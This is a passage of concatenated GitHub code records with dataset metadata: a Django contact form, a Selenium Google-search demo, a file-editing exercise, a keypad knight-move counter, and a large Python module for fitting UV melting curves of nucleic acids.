t_addrs, t_hops, t_succ))\n print(\"*** rfc1918 deleted %d, recurring addrs %d, hops %d\\n\" % (\n t_1918_deleted, t_addrs_deleted, t_hops_deleted))\n return t_traces, t_addrs, t_hops, t_succ, t_addrs_deleted, t_hops_deleted\n","repo_name":"nevil-brownlee/Atlas-graphs","sub_path":"read_atlas_gz.py","file_name":"read_atlas_gz.py","file_ext":"py","file_size_in_byte":10478,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"42397316560","text":"from django.utils.translation import ugettext_lazy as _\nfrom django.contrib.auth import get_user_model\nfrom django import forms\n\n# Get the user from settings\nUser = get_user_model()\n\n\nclass SendEmailForm(forms.Form):\n \"\"\"\n Form to send email to admin user.\n \"\"\"\n\n name = forms.CharField(\n max_length=100,\n label=_(\"Name\"),\n help_text=_(\"Insert your name.\")\n )\n\n email = forms.EmailField(\n label=_(\"Email\"),\n help_text=_(\"Insert your email.\")\n )\n\n message = forms.CharField(\n max_length=1000,\n label=_(\"Message\"),\n help_text=_(\"Insert the message.\"),\n widget=forms.Textarea\n )\n","repo_name":"2018-1-Testes-Grupo-6/TBL","sub_path":"core/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"32"} +{"seq_id":"29278460940","text":"from selenium import webdriver\r\nimport selenium\r\nimport time\r\nchrome_options = webdriver.ChromeOptions()\r\nchrome_options.binary_location = r\"C:\\Program Files (x86)\\Google\\Chrome Beta\\Application\\chrome.exe\"\r\n\r\nprefs = {\"profile.managed_default_content_settings.images\": 2}\r\nchrome_options.add_experimental_option(\"prefs\", prefs)\r\n# chrome_options.add_argument('--headless')\r\nchrome_options.add_argument('--disable-gpu')\r\ndriver = webdriver.Chrome(\r\n executable_path=r\"D:/HUST/BI/BI/chromedriver.exe\",\r\n chrome_options=chrome_options\r\n)\r\n\r\n\r\ndriver.get('http://www.google.com/')\r\ntime.sleep(5) # Let the user actually see something!\r\nsearch_box = driver.find_element_by_name('q')\r\nsearch_box.send_keys('ChromeDriver')\r\nsearch_box.submit()\r\ntime.sleep(5) # Let the user actually see something!\r\ndriver.quit()","repo_name":"thanhdath/RealtimeTrendingKeywords","sub_path":"test/run_selenium.py","file_name":"run_selenium.py","file_ext":"py","file_size_in_byte":812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"35868127040","text":"#!/usr/bin/python3\n# Anas Jelloul\n\"\"\"Impliment insertion function.\"\"\"\n\n\ndef append_after(filename=\"\", search_string=\"\", new_string=\"\"):\n \"\"\"Insert text after each line containing a given string in a file.\n\n Args:\n filename (str): name_file.\n search_string (str): searched string.\n new_string (str): string to be inserted.\n \"\"\"\n txt = \"\"\n with open(filename) as r:\n for ln in r:\n txt += ln\n if search_string in ln:\n txt += new_string\n with open(filename, \"w\") as w:\n w.write(txt)\n","repo_name":"anasjelloule/alx-higher_level_programming","sub_path":"0x0B-python-input_output/100-append_after.py","file_name":"100-append_after.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72740447130","text":"movimientos = {\n 0: [6, 4],\n 1: [6, 8],\n 2: [7, 9],\n 3: [4, 8],\n 4: [3, 9, 0],\n 5: [],\n 6: [1, 7, 0],\n 7: [2, 6],\n 8: [1, 3],\n 9: [2, 4]\n}\n\n# Usaremos memoización para almacenar los resultados calculados\nmemo = {}\n\n\ndef calcular(inicio, pasos, n):\n # Verificar si ya calculamos esto antes\n if (inicio, pasos, n) in memo:\n return memo[(inicio, pasos, n)]\n\n movs = 0\n if pasos == 0:\n return 1\n if n > 0:\n for siguiente in movimientos[inicio]:\n movs += calcular(siguiente, pasos - 1, n - 1)\n\n # Almacenar el resultado calculado en la memoización\n memo[(inicio, pasos, n)] = movs\n\n return movs\n\n\ndef totalizar(pasos, n):\n total = 0\n for i in range(10):\n total += calcular(i, pasos, n)\n return total\n\n\nn = 100 # Especifica el número de movimientos\ntotal_movements = totalizar(n, n)\nprint(f\"Total de movimientos para {n} pasos: {total_movements}\")","repo_name":"frankiyonki/Tarea1","sub_path":"tarea1/caballo.py","file_name":"caballo.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37270278774","text":"\"\"\"\r\nFunctions for UV melting analysis\r\n\"\"\"\r\nimport numpy as np\r\nimport pandas as pd\r\nfrom scipy import stats\r\nimport os, json\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib.ticker import (MultipleLocator, FormatStrFormatter,\r\n AutoMinorLocator)\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport seaborn as sns\r\nfrom tqdm import tqdm\r\nfrom lmfit import minimize, Minimizer, Parameters, report_fit\r\nfrom scipy.interpolate import interp1d\r\nfrom scipy import signal\r\nfrom hampel import hampel\r\nfrom .util import *\r\nfrom . import processing\r\n\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n\r\ndef get_blanked_fn(fn):\r\n split_fn = os.path.splitext(fn)\r\n blanked_fn = split_fn[0] + '_blanked' + split_fn[1]\r\n return blanked_fn\r\n\r\ndef query_curve_in_df(df, curve_name):\r\n \"\"\"\r\n Args:\r\n curve_name - Dict\r\n \"\"\"\r\n row = df.query(\"curve_date == '%s' & curve_num == '%s'\" % (curve_name['curve_date'], curve_name['curve_num']))\r\n return row\r\n\r\ndef lookup_sample_df(df, df_ref, key):\r\n # looks up `key` in `df_ref`\r\n return df.apply(lambda row: df_ref.query(\"curve_date == '%s' & curve_num == '%s'\" % (row['curve_date'], row['curve_num']))[key].values[0], axis=1)\r\n\r\ndef find_blank_reference_curve_str(curve_str: str, blank_to):\r\n if not np.isnan(blank_to):\r\n curve_str_list = curve_str.split('_')\r\n blank_curve_str = '%s_%d_%s' % (curve_str_list[0], blank_to, curve_str_list[2])\r\n else:\r\n blank_curve_str = curve_str\r\n return blank_curve_str\r\n\r\ndef format_cd_data(fn):\r\n \"\"\"\r\n Format CD txt data to the same as from ECL\r\n \"\"\"\r\n curve = pd.read_table(fn, header=None)\r\n\r\n curve.columns = ['celsius', 'cd', 'v', 'absorbance']\r\n curve.drop(columns = ['cd', 'v'], inplace=True)\r\n\r\n curve.to_csv(fn.replace('.txt', '.csv'), index=False, header=None)\r\n \r\n\r\ndef read_curve(fn):\r\n curve = pd.read_csv(fn, header=None)\r\n curve.columns = ['celsius', 'absorbance']\r\n curve.sort_values(by='celsius', inplace=True)\r\n return curve\r\n \r\ndef read_sample_sheet(fn):\r\n sample_df = pd.read_csv(fn, index_col=0)\r\n sample_df['curve_date'] = sample_df['curve_date'].astype(str)\r\n sample_df['curve_num'] = sample_df['curve_num'].astype(str)\r\n \r\n #----- fill out default settings -----\r\n sample_df.celsius_min.fillna(sample_df.MinTemperature, inplace=True)\r\n sample_df.celsius_max.fillna(sample_df.MaxTemperature, inplace=True)\r\n # sample_df.loc[np.logical_and(sample_df.Blank == \"manual\", sample_df.SEQID != 'blank'), \"BlankTo\"].fillna(7)\r\n sample_df.loc[:,\"BlankTo\"].fillna(int(7), inplace=True)\r\n \r\n return sample_df\r\n\r\ndef parse_curve_name(fn):\r\n curve_date = fn.split('/')[-2].split('_')[0]\r\n curve_num = fn.split('/')[-1].split('_')[0]\r\n curve_name = fn.split('/')[-1].split('_')[1].split('.csv')[0]\r\n curve_str = f'{curve_date}_{curve_num}_{curve_name}'\r\n return dict(curve_date=curve_date, curve_num=curve_num, \r\n curve_name=curve_name, curve_str=curve_str)\r\n\r\ndef format_fit_result(out):\r\n result_dict = {}\r\n for p in ('dH', 'Tm', 'fmax', 'fmin', 's1', 's2'):\r\n result_dict[p] = out.params[p].value\r\n result_dict[p+'_std'] = out.params[p].stderr\r\n result_dict['rmse'] = np.sqrt(np.mean(np.square(out.residual)))\r\n return result_dict\r\n\r\ndef plot_curve_basic(curve):\r\n plt.plot(curve.celsius, curve.absorbance, '.')\r\n\r\ndef plot_curve_fit_result(row, return_curve=False):\r\n fn = row['data_file']\r\n blanked_fn = get_blanked_fn(fn)\r\n if os.path.isfile(blanked_fn):\r\n fn = blanked_fn\r\n curve = read_curve(fn)\r\n \r\n curve_predict = curve_model(curve.celsius, **{x:row[x] for x in ['dH','Tm','fmax','fmin','s1', 's2']})\r\n plt.plot(curve.celsius, curve.absorbance, '.')\r\n plt.plot(curve.celsius, \r\n curve_predict - curve_predict[0] + curve.absorbance[0])\r\n plt.axvline(row['Tm'], linestyle='--', c='gray')\r\n \r\n if 'SEQID' in row.index:\r\n plt.title('%s %s' % (row['SEQID'], row['curve_name']))\r\n else:\r\n plt.title('%s' % (row['data_file']))\r\n sns.despine()\r\n plt.show()\r\n \r\n if return_curve:\r\n return curve\r\n \r\ndef plot_curve_preview_of_datadir(datadir:str, sample_sheet_file:str, plot_fn:str=None):\r\n \"\"\"\r\n Plot raw absorbance of all curves in a single pdf file for preview and troubleshotting.\r\n Upper row: raw\r\n Lower row: if maunal blank, the blanked curves\r\n \"\"\"\r\n color_dict = dict(\r\n MeltingCurve='#a6cee3',\r\n CoolingCurve='#1f78b4',\r\n SecondaryMeltingCurve='#b2df8a',\r\n SecondaryCoolingCurve='#33a02c',\r\n TertiaryMeltingCurve='#fb9a99',\r\n TertiaryCoolingCurve='#e31a1c'\r\n )\r\n \r\n if plot_fn is None:\r\n plot_fn = os.path.join(datadir, \"preview_raw_absorbance_all_curves.pdf\")\r\n \r\n data_list = [fn for fn in absolute_file_paths(datadir) if fn.endswith('.csv')]\r\n sample_sheet = read_sample_sheet(sample_sheet_file)#.iloc[-21:,:]\r\n \r\n result_df = make_empty_result_df(data_list, sample_sheet, blank=True)\r\n result_df.sort_values(by=['curve_date', 'curve_num'], inplace=True)\r\n result_df['SEQID'] = lookup_sample_df(result_df, sample_sheet, 'SEQID')\r\n result_df['Blank'] = lookup_sample_df(result_df, sample_sheet, 'Blank')\r\n curve_dates = np.unique(result_df.curve_date)\r\n figs = [None for _ in range(len(curve_dates))]\r\n \r\n for i,curve_date in enumerate(curve_dates):\r\n formatted_curve_date = '%s-%s-%s %s:00' % (curve_date[:2], curve_date[2:4], curve_date[4:6], curve_date[6:])\r\n figs[i], ax = plt.subplots(2,7,figsize=(12,4), sharex=False, sharey=False)\r\n # ax=ax.flatten()\r\n plt.suptitle(formatted_curve_date)\r\n exp_df = result_df.query('curve_date == \"%s\"'%curve_date)\r\n for j,row in exp_df.iterrows():\r\n # raw curves\r\n curve = read_curve(row.data_file)\r\n curve_num = int(row.curve_num)\r\n curve_color = color_dict[row.curve_name]\r\n ax[0,curve_num-1].plot(curve.celsius, curve.absorbance, \r\n c=curve_color, linewidth=2)\r\n try:\r\n seqid = row['SEQID']\r\n except:\r\n seqid = \"\"\r\n ax[0,curve_num-1].set_title(seqid)\r\n \r\n # blanked curves\r\n if row.Blank == 'manual':\r\n try:\r\n blank_curve = read_curve(exp_df.query('curve_num == \"7\" & curve_name == \"%s\"'%row.curve_name).data_file.values[0])\r\n blanked_curve = curve.absorbance - blank_curve.absorbance\r\n ax[1,curve_num-1].plot(curve.celsius, blanked_curve,\r\n c=curve_color, linewidth=2, linestyle=':')\r\n except:\r\n pass\r\n \r\n sns.despine()\r\n \r\n _ = [ax[1,i].set_xlabel('Celsius (°C)') for i in range(7)]\r\n _ = [ax[i,0].set_ylabel('Absorbance') for i in range(2)]\r\n \r\n save_multi_image(plot_fn, figs)\r\n \r\n return result_df\r\n\r\ndef get_2nd_diff_autocorrelation(y, plot=False):\r\n y = y - np.mean(y)\r\n yacorr = np.correlate(y, y, 'full')[:len(y)]\r\n yacorr = yacorr / np.var(y) / len(y)\r\n yacorr_2diff = np.diff(yacorr, n=2)\r\n if plot:\r\n _,ax = plt.subplots(1,3, figsize=(12,2))\r\n ax[0].plot(y)\r\n ax[1].plot(yacorr)\r\n ax[2].plot(yacorr_2diff)\r\n \r\n return yacorr_2diff\r\n\r\ndef qc_blank_curve(curve):\r\n isgood = True\r\n zscore = np.nanstd(curve.absorbance) / np.nanmedian(curve.absorbance)\r\n if zscore > 0.2:\r\n isgood = False\r\n acorr_2diff = get_2nd_diff_autocorrelation(curve.absorbance)\r\n if np.max(np.abs(acorr_2diff)) > 0.005:\r\n isgood = False\r\n return isgood\r\n\r\n### Directly fit the curves ###\r\ndef curve_model(x, dH, Tm, fmin, fmax, s1, s2):\r\n # define the function\r\n return fmin + s1 * x + (((s2 - s1) * x + fmax - fmin)/(1 + np.exp(dH /0.0019872 * ((Tm + 273.15)**(-1) - (x + 273.15)**(-1)))))\r\n\r\ndef residual(pars, x, data):\r\n dH, Tm, fmax, fmin, s1, s2 = pars['dH'], pars['Tm'], pars['fmax'], pars['fmin'], pars['s1'], pars['s2']\r\n model = curve_model(x, dH, Tm, fmin, fmax, s1, s2)\r\n return model - data\r\n\r\ndef fit_param_direct(curve, Tm=None, celsius_min=5, celsius_max=95, smooth=True, plot_title=''):\r\n pfit = Parameters()\r\n data_max = np.max(curve.absorbance)\r\n data_min = np.min(curve.absorbance)\r\n pfit.add(name='dH', value=-20)\r\n if Tm is None:\r\n pfit.add(name='Tm', value=(celsius_max + celsius_min) * 0.5)\r\n else:\r\n pfit.add(name='Tm', value=Tm, vary=False)\r\n \r\n pfit.add(name='fmax', value=2*data_max, min=data_min, max=20*data_max)\r\n pfit.add(name='fmin', value=max(0.2*data_min, 0.01), min=-0.1, max=data_max)\r\n pfit.add(name='s1', value = 1e-5, max=5.0, min=-1.0)\r\n pfit.add(name='s2', value = 1e-5, max=2.0, min=-2.0)\r\n # pfit.add(name='delta_f', )\r\n\r\n curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}')\r\n if smooth:\r\n # Anomaly detection with hampel\r\n outlier_idx = hampel(curve_used.loc[:, 'absorbance'])\r\n curve_used.drop(index = curve_used.index[outlier_idx], inplace=True)\r\n\r\n out_tmp = minimize(residual, pfit, args=(curve_used.celsius,), \r\n kws={'data': curve_used.absorbance})\r\n \r\n pfit['Tm'].set(vary=True)\r\n for p in ['dH', 'fmin', 'fmax', 's1', 's2']:\r\n pfit[p].set(value=out_tmp.params[p].value)\r\n \r\n out = minimize(residual, pfit, args=(curve_used.celsius,), \r\n kws={'data': curve_used.absorbance})\r\n \r\n best_fit = curve_used.absorbance + out.residual\r\n \r\n fig, ax = plt.subplots(figsize=(4,3))\r\n ax.plot(curve.celsius, curve.absorbance, '+', c='purple')\r\n ax.plot(curve_used.celsius, curve_used.absorbance, 'x', c='g')\r\n ax.plot(curve_used.celsius, best_fit, 'orange', linewidth=2.5)\r\n ax.set_xlabel('temperature (°C)')\r\n ax.set_ylabel(r'absorbance')\r\n ax.set_title(plot_title)\r\n sns.despine()\r\n \r\n return out\r\n\r\n\r\n### Use the d_absorbance method ###\r\ndef fit_Tm_d_absorbance(curve, celsius_min=5, celsius_max=95, whatever=False):\r\n \"\"\"\r\n For a first pass before direct fit. Only fits Tm because fmax and fmin are unknown.\r\n \"\"\"\r\n # == Calculate d_p_unfold ==\r\n curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}').sort_values(by='celsius')\r\n acorr_2diff = get_2nd_diff_autocorrelation(curve_used.absorbance)\r\n\r\n if (not whatever) and (curve_used.absorbance.isnull().values.any() or np.max(np.abs(acorr_2diff)) > 0.005):\r\n # run away fast\r\n # if has bad values or jumps (intervention) in the series\r\n return dict(is_usable=False, Tm=np.nan)\r\n \r\n # Upsampled 10x\r\n x = np.arange(curve_used.celsius.iloc[0], curve_used.celsius.iloc[-1], 0.1)\r\n signal_used = signal.savgol_filter(curve_used.absorbance, 9, 3, mode='nearest')\r\n f = interp1d(curve_used.celsius, \r\n signal_used, \r\n kind='cubic')\r\n # dx/dT = dx/0.1, where dT = 0.1 from upsampling\r\n d_p_unfold = np.diff(f(x)) * 10\r\n d_p_unfold = signal.savgol_filter(d_p_unfold, 99, 3)\r\n \r\n # == Find a reasonable range to use ==\r\n is_usable = True\r\n d_p_sign = np.sign(d_p_unfold)\r\n # tag BAD if more than a certain part of the curve is decreasing\r\n if np.count_nonzero(d_p_sign == -1) > 0.2 * len(d_p_unfold):\r\n is_usable = False\r\n \r\n # common problem: decreasing at high temperature\r\n # solution: overwrite celsius_max when it first starts to decrease monotomically\r\n # doesn't affect\r\n win_len = 15 # 1.5 °C\r\n local_sum = np.convolve(d_p_sign, np.ones(win_len), 'valid')\r\n # if not found, celsius_max_idx will be 0\r\n celsius_max_idx = np.argmax(local_sum <= win_len + 1)\r\n celsius_min_idx = np.argmax(local_sum >= win_len - 1)\r\n if celsius_max_idx > 0:\r\n celsius_max = x[celsius_max_idx]\r\n if celsius_min_idx > 0:\r\n celsius_min = x[celsius_min_idx]\r\n \r\n # == Call peaks ==\r\n peaks = signal.find_peaks(d_p_unfold)[0]\r\n try:\r\n ind_max = np.argmax(d_p_unfold[peaks])\r\n Tm = x[peaks[ind_max]]\r\n except:\r\n Tm = np.nan\r\n \r\n if whatever:\r\n is_usable = True\r\n \r\n result_dict = dict(Tm=Tm, is_usable=is_usable, celsius_min=celsius_min, celsius_max=celsius_max)\r\n return result_dict\r\n\r\ndef fit_param_d_absorbance(curve, out, celsius_min=5, celsius_max=95, smooth=True, plot_title=''):\r\n \"\"\"\r\n Deprecated. Other parameters than Tm are not very reliable from this method.\r\n \"\"\"\r\n curve_used = curve.query(f'celsius >= {celsius_min} & celsius <= {celsius_max}').sort_values(by='celsius')\r\n x = np.arange(curve_used.celsius.iloc[0], curve_used.celsius.iloc[-1], 0.1)\r\n signal_used = signal.savgol_filter(curve_used.absorbance, 9, 3, mode='nearest')\r\n signal_used = (signal_used - out.params['fmin'] - out.params['slope'] * curve_used.celsius.values) / (out.params['fmax'] - out.params['fmin'])\r\n f = interp1d(curve_used.celsius, \r\n signal_used, \r\n kind='cubic')\r\n d_p_unfold = np.diff(f(x)) * 10\r\n if smooth:\r\n d_p_unfold = signal.savgol_filter(d_p_unfold, 99, 3)\r\n peaks = signal.find_peaks(d_p_unfold)[0]\r\n ind_max = np.argmax(d_p_unfold[peaks])\r\n peak = peaks[ind_max]\r\n \r\n fig, ax = plt.subplots(figsize=(4,3))\r\n ax.plot(x[:-1], d_p_unfold, 'k')\r\n ax.axvline(x=x[peak], ls='--', c='gray')\r\n ax.set_xlabel('temperature (°C)')\r\n ax.set_ylabel(r\"$p_{unfold}'$\")\r\n ax.set_title(plot_title)\r\n sns.despine()\r\n \r\n result = {}\r\n result['Tm_diff'] = x[peak]\r\n result['dH_diff'] = - d_p_unfold[peak] * 4 * 0.0019872 * (result['Tm_diff'] + 273.15)**2\r\n result['dS_diff'] = result['dH_diff'] / (result['Tm_diff'] + 273.15)\r\n result['dG_37_diff'] = get_dG(result['dH_diff'], result['Tm_diff'], 37)\r\n result['rmse_diff'] = rmse(curve_model(curve_used.celsius, result['dH_diff'], result['Tm_diff'], out.params['fmin'], out.params['fmax'], out.params['s1'], out.params['s2']),\r\n curve_used.absorbance.values)\r\n \r\n return result\r\n\r\n\r\n### Master Function ###\r\ndef fit_curve(fn, figdir='', verbose=False, debug=False, \r\n blank=None, **kwargs):\r\n def fit():\r\n curve = read_curve(fn)\r\n if isinstance(blank, pd.DataFrame):\r\n curve['absorbance'] -= blank['absorbance']\r\n elif isinstance(blank, float):\r\n curve['absorbance'] -= blank\r\n \r\n # Shift up so all values are positive\r\n curve['absorbance'] = curve['absorbance'] - np.min(curve['absorbance'].values) + 0.01\r\n \r\n # Save the blanked curve to disk\r\n blanked_fn = get_blanked_fn(fn)\r\n curve.to_csv(blanked_fn, index=False, header=False)\r\n \r\n curve_name = parse_curve_name(fn)\r\n if verbose:\r\n print(curve_name['curve_str'])\r\n d_absorbance_result_dict = fit_Tm_d_absorbance(curve, **kwargs)\r\n if not d_absorbance_result_dict['is_usable'] or np.isnan(d_absorbance_result_dict['Tm']):\r\n # give up fast and run away\r\n raise Exception(\"Sorry, curve is too crazy for %s\"%fn)\r\n \r\n Tm = d_absorbance_result_dict['Tm']\r\n kwargs['celsius_max'] = d_absorbance_result_dict['celsius_max']\r\n out = fit_param_direct(curve, Tm=Tm, \r\n plot_title=curve_name['curve_str'], **kwargs)\r\n save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_direct_fit.png\"))\r\n # result = fit_param_d_absorbance(curve, out, plot_title=curve_name['curve_str'], **kwargs)\r\n # save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_d_p_unfold.png\"))\r\n result_dict = format_fit_result(out)\r\n result_dict.update(kwargs)\r\n result_dict.update(curve_name)\r\n result_dict['data_file'] = fn\r\n if verbose:\r\n print('\\tDone!')\r\n return result_dict\r\n \r\n if debug:\r\n result_dict = fit()\r\n return result_dict\r\n else:\r\n try:\r\n result_dict = fit()\r\n return result_dict\r\n except:\r\n # print(\"Trouble with\", fn)\r\n return dict()\r\n\r\ndef fit_cd_curve(fn, figdir='', verbose=False, debug=False, \r\n **kwargs):\r\n def fit():\r\n curve = pd.read_table(fn, header=None)\r\n curve.columns = ['celsius', 'cd', 'v', 'absorbance']\r\n curve.drop(columns = ['cd', 'v'], inplace=True)\r\n \r\n curve_str = os.path.splitext(os.path.split(fn)[-1])[0]\r\n curve_name = dict(curve_str=curve_str,\r\n curve_name=curve_str.split('-')[1],\r\n seqid=curve_str.split('-')[0])\r\n if verbose:\r\n print(curve_name['curve_str'])\r\n d_absorbance_result_dict = fit_Tm_d_absorbance(curve, whatever=True, **kwargs)\r\n if not d_absorbance_result_dict['is_usable'] or np.isnan(d_absorbance_result_dict['Tm']):\r\n print(d_absorbance_result_dict)\r\n # give up fast and run away\r\n raise Exception(\"Sorry, curve is too crazy for %s\"%fn)\r\n \r\n Tm = d_absorbance_result_dict['Tm']\r\n kwargs['celsius_max'] = d_absorbance_result_dict['celsius_max']\r\n out = fit_param_direct(curve, Tm=Tm, \r\n plot_title=curve_name, **kwargs)\r\n save_fig(os.path.join(figdir, f\"{curve_name['curve_str']}_direct_fit.png\"))\r\n # result = fit_param_d_absorbance(curve, out, plot_title=curve_name['curve_str'], **kwargs)\r\n # save_fig(os.path.join(figdir, curve_name['curve_date'], f\"{curve_name['curve_num']}_{curve_name['curve_name']}_d_p_unfold.png\"))\r\n result_dict = format_fit_result(out)\r\n result_dict.update(kwargs)\r\n result_dict.update(curve_name)\r\n result_dict['data_file'] = fn\r\n if verbose:\r\n print('\\tDone!')\r\n return result_dict\r\n \r\n if debug:\r\n result_dict = fit()\r\n return result_dict\r\n else:\r\n try:\r\n result_dict = fit()\r\n return result_dict\r\n except:\r\n # print(\"Trouble with\", fn)\r\n return dict()\r\n\r\ndef fit_all_cd_curves(datadir):\r\n datafiles = [x for x in os.listdir(datadir) if x.endswith('.txt')]\r\n \r\n result_columns = ['curve_str', 'seqid', 'curve_name', \r\n 'dH', 'dH_std', 'Tm', 'Tm_std', \r\n 'fmax', 'fmax_std', 'fmin', 'fmin_std', \r\n 's1', 's1_std', 's2', 's2_std', 'rmse',\r\n 'celsius_min', 'celsius_max', 'data_file']\r\n result_df = pd.DataFrame(index=np.arange(len(datafiles)), columns=result_columns)\r\n \r\n for i,fn in enumerate(datafiles):\r\n result_dict = fit_cd_curve(os.path.join(datadir,fn), figdir=os.path.join(datadir, 'fig'), \r\n debug=True, verbose=True)\r\n result_df.iloc[i, :] = result_dict\r\n \r\n return result_df.sort_values(by=['seqid', 'curve_name'])\r\n \r\ndef make_empty_result_df(data_list, sample_sheet: pd.DataFrame, blank: bool=False):\r\n #----- make the index and column names for result_df -----\r\n result_index = []\r\n curve_date, curve_num, curve_name, blank_to_list, data_file = [], [], [], [], []\r\n \r\n for fn in data_list:\r\n curve_dict = parse_curve_name(fn)\r\n row = query_curve_in_df(sample_sheet, curve_dict)\r\n if len(row) > 0:\r\n result_index.append(curve_dict['curve_str'])\r\n curve_date.append(curve_dict['curve_date'])\r\n curve_num.append(curve_dict['curve_num'])\r\n curve_name.append(curve_dict['curve_name'])\r\n data_file.append(fn)\r\n if row.Blank.values[0] == 'manual':\r\n blank_to_list.append(find_blank_reference_curve_str(curve_dict['curve_str'], row.BlankTo.values[0]))\r\n else:\r\n blank_to_list.append('no_manual_blank')\r\n elif len(row) == 0:\r\n data_list.remove(fn)\r\n\r\n result_columns = ['curve_date', 'curve_num', 'curve_name',\r\n 'dH', 'dH_std', 'Tm', 'Tm_std', \r\n 'fmax', 'fmax_std', 'fmin', 'fmin_std', \r\n 's1', 's1_std', 's2', 's2_std', 'rmse',\r\n 'celsius_min', 'celsius_max', 'data_file']\r\n\r\n result_df = pd.DataFrame(index=result_index, columns=result_columns)\r\n result_df.curve_date = np.array(curve_date, dtype=str)\r\n result_df.curve_num = np.array(curve_num, dtype=str)\r\n result_df.curve_name = curve_name\r\n result_df.data_file = data_file\r\n\r\n if blank:\r\n result_df['blank'] = blank_to_list\r\n \r\n return result_df\r\n \r\n\r\n### Fit from sample_sheet ###\r\ndef fit_all_manual_blank(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv',\r\n qc_criterion = 'rmse < 0.015 & dH_std < 10 & Tm_std < 5'):\r\n \"\"\"\r\n This function blanks all the curves first before fitting.\r\n If not manual blank or cannot find blank, use the original curve.\r\n Reads and caches all blank data at once first.\r\n \"\"\"\r\n\r\n #----- Read files -----\r\n sample_sheet = read_sample_sheet(sample_sheet_file)#.query(\"Blank == 'manual'\")\r\n data_list = [fn for fn in absolute_file_paths(datadir) if (fn.endswith('.csv') and (not fn.endswith('_blanked.csv')))]\r\n \r\n #----- make the index and column names for result_df -----\r\n result_df = make_empty_result_df(data_list, sample_sheet, blank=True)\r\n \r\n #----- read blank curves -----\r\n all_blanks = np.unique(result_df['blank'])\r\n blank_dict = dict()\r\n for blank_str in all_blanks:\r\n if not blank_str in result_df.index:\r\n # check the blanks are in the dataset\r\n print( \"blank data %s not in the dataset!\" % blank_str )\r\n blank_dict[blank_str] = 0\r\n else:\r\n blank_fn = data_list[result_df.index.to_list().index(blank_str)]\r\n blank_dict[blank_str] = read_curve(blank_fn)\r\n # QC blank curvel\r\n if not qc_blank_curve(blank_dict[blank_str]):\r\n blank_dict[blank_str] = np.nan # throw affected curves away\r\n \r\n #----- fit curves -----\r\n for fn in tqdm(data_list):\r\n curve_name = parse_curve_name(fn)\r\n row = query_curve_in_df(sample_sheet, curve_name)\r\n\r\n if len(row) == 0 or (curve_name['curve_str'] in all_blanks) or (not row['Usable'].values[0]):\r\n continue\r\n else:\r\n try:\r\n blank_curve = blank_dict[result_df.loc[curve_name['curve_str'], 'blank']]\r\n except:\r\n blank_curve = 0\r\n \r\n result_dict = fit_curve(fn, figdir=os.path.join(datadir,'fig'), \r\n blank=blank_curve,\r\n debug=False,\r\n celsius_min=row.at[row.index[0],'celsius_min'],\r\n celsius_max=row.at[row.index[0],'celsius_max'])\r\n result_df.loc[curve_name['curve_str'], :] = result_dict\r\n \r\n result_df.dropna(subset=['dH', 'Tm', 'rmse'], inplace=True)\r\n \r\n result_df['pass_qc'] = result_df.eval(qc_criterion)\r\n \r\n result_df['SEQID'] = ''\r\n for col in ['SEQID', 'conc_uM', 'Na_mM', 'celsius_min', 'celsius_max', 'Cuvette']:\r\n result_df[col] = lookup_sample_df(result_df, sample_sheet, col)\r\n \r\n result_df['dG_37'] = get_dG(result_df['dH'], result_df['Tm'], celsius=37)\r\n result_df['dS'] = result_df['dH'] / (result_df['Tm'] + 273.15)\r\n result_df.to_csv(result_file)\r\n \r\n return result_df\r\n \r\n \r\n\r\ndef fit_all_no_blank(datadir:str, sample_sheet_file:str, result_file:str='uvmelt.csv'):\r\n #----- Hardcoded QC -----\r\n qc_criterion = 'rmse < 0.015 & dH_std < 10 & Tm_std < 5'\r\n \r\n #----- Read files -----\r\n sample_sheet = read_sample_sheet(sample_sheet_file).query(\"Blank != 'manual'\")\r\n data_list = [fn for fn in absolute_file_paths(datadir) if fn.endswith('.csv')]\r\n \r\n #----- make the index and column names for result_df -----\r\n result_df = make_empty_result_df(data_list, sample_sheet)\r\n\r\n #----- fit curves -----\r\n for fn in tqdm(data_list):\r\n curve_name = parse_curve_name(fn)\r\n row = query_curve_in_df(sample_sheet, curve_name)\r\n\r\n if len(row) == 0:\r\n print(fn)\r\n continue\r\n else:\r\n result_dict = fit_curve(fn, figdir=os.path.join(datadir,'fig'), \r\n celsius_min=row.at[row.index[0],'celsius_min'],\r\n celsius_max=row.at[row.index[0],'celsius_max'])\r\n\r\n result_df.loc[curve_name['curve_str'], :] = result_dict\r\n \r\n result_df.dropna(inplace=True)\r\n \r\n result_df['pass_qc'] = result_df.eval(qc_criterion)\r\n \r\n for col in ['SEQID', 'conc_uM', 'Na_mM', 'celsius_min', 'celsius_max']:\r\n result_df[col] = lookup_sample_df(result_df, sample_sheet, col)\r\n \r\n result_df['dG_37'] = get_dG(result_df['dH'], result_df['Tm'], celsius=37)\r\n result_df['dS'] = result_df['dH'] / (result_df['Tm'] + 273.15)\r\n result_df['isCooling'] = result_df.curve_name.apply(lambda x: 'Cooling' in x)\r\n result_df.to_csv(result_file)\r\n \r\n #----- Plot QC -----\r\n fig, ax = plt.subplots(1, 2, figsize=(8,4))\r\n sns.scatterplot(data=result_df, \r\n x='rmse', y='Tm_std', color='gray',\r\n ax=ax[0])\r\n sns.scatterplot(data=result_df.query(qc_criterion), \r\n x='rmse', y='Tm_std', color='salmon',\r\n ax=ax[0])\r\n ax[0].axhline(5, linestyle='--', c='gray')\r\n ax[0].axvline(0.015, linestyle='--', 